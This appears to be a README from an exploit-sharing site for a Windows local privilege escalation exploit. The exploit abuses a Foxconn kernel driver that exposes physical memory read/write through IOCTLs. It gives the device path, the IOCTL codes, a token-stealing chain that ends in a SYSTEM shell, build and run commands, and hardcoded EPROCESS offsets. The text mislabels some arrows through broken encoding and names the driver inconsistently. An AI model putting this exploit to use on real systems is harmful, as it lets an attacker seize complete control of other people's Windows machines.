Share
## https://sploitus.com/exploit?id=088A8F80-5C39-58AA-AAD1-BEDF25A12922
```markdown
# Fox_FOXONE Driver Exploit

Local privilege escalation to SYSTEM via a vulnerable Foxconn kernel driver.


---

## Overview

Exploits two vulnerabilities in the Foxconn FoxKeDriver64.sys kernel driver:

1. VA โ†’ PA disclosure โ€” MmGetPhysicalAddress exposed via IOCTL,
   allowing any administrator to translate virtual to physical addresses
2. Unrestricted physical R/W โ€” MmMapIoSpace exposed via IOCTL,
   allowing direct physical memory read/write from usermode

Exploit chain:
1. Translate ntoskrnl.exe virtual addresses to physical
2. Walk EPROCESS list in physical memory
3. Steal SYSTEM token and overwrite current process token
4. Spawn a SYSTEM shell

---

## Target

| Field    | Value                              |
|----------|------------------------------------|
| Device   | `\\.\Fox_FOXONE_Driver`            |
| Driver   | Foxconn Fox_FOXONE kernel driver   |
| OS       | Windows 10 x64 Build 19045         |

---

## IOCTLs

| Code         | Direction      | Description                        |
|--------------|----------------|------------------------------------|
| `0x2220C0`   | VA โ†’ PA        | Translate virtual to physical addr |
| `0x2220CC`   | Read           | Physical memory read (variant 1)   |
| `0x2220D4`   | Read           | Physical memory read (variant 2)   |
| `0x2220D8`   | Write          | Physical memory write (variant 1)  |
| `0x2220E0`   | Write          | Physical memory write (variant 2)  |

---

## Build

Open **x64 Native Tools Command Prompt for VS** and run:

cl /nologo /O2 exploit.c /Fe:exploit.exe /link psapi.lib advapi32.lib

```
---

## Run
First load the driver using OSR loader or any approach u wana use then
From an normal command prompt:

```bat
exploit.exe
```

A SYSTEM shell spawns. Verify with:

```bat
whoami
```

---

## Offsets

Hardcoded for **Windows 10 x64 Build 19045**. For other builds,
look up the correct offsets in WinDbg:

```
dt nt!_EPROCESS Token
dt nt!_EPROCESS ActiveProcessLinks
dt nt!_EPROCESS UniqueProcessId
```

Then update the `#define` values at the top of `exploit.c`:

```c
#define EPROCESS_TOKEN               0x4b8
#define EPROCESS_ACTIVE_PROCESS_LINKS 0x448
#define EPROCESS_UNIQUE_PROCESS_ID   0x440
```

---

## Disclaimer

For educational and authorized  use only.
Do not run on systems you do not own or have explicit permission to test.
```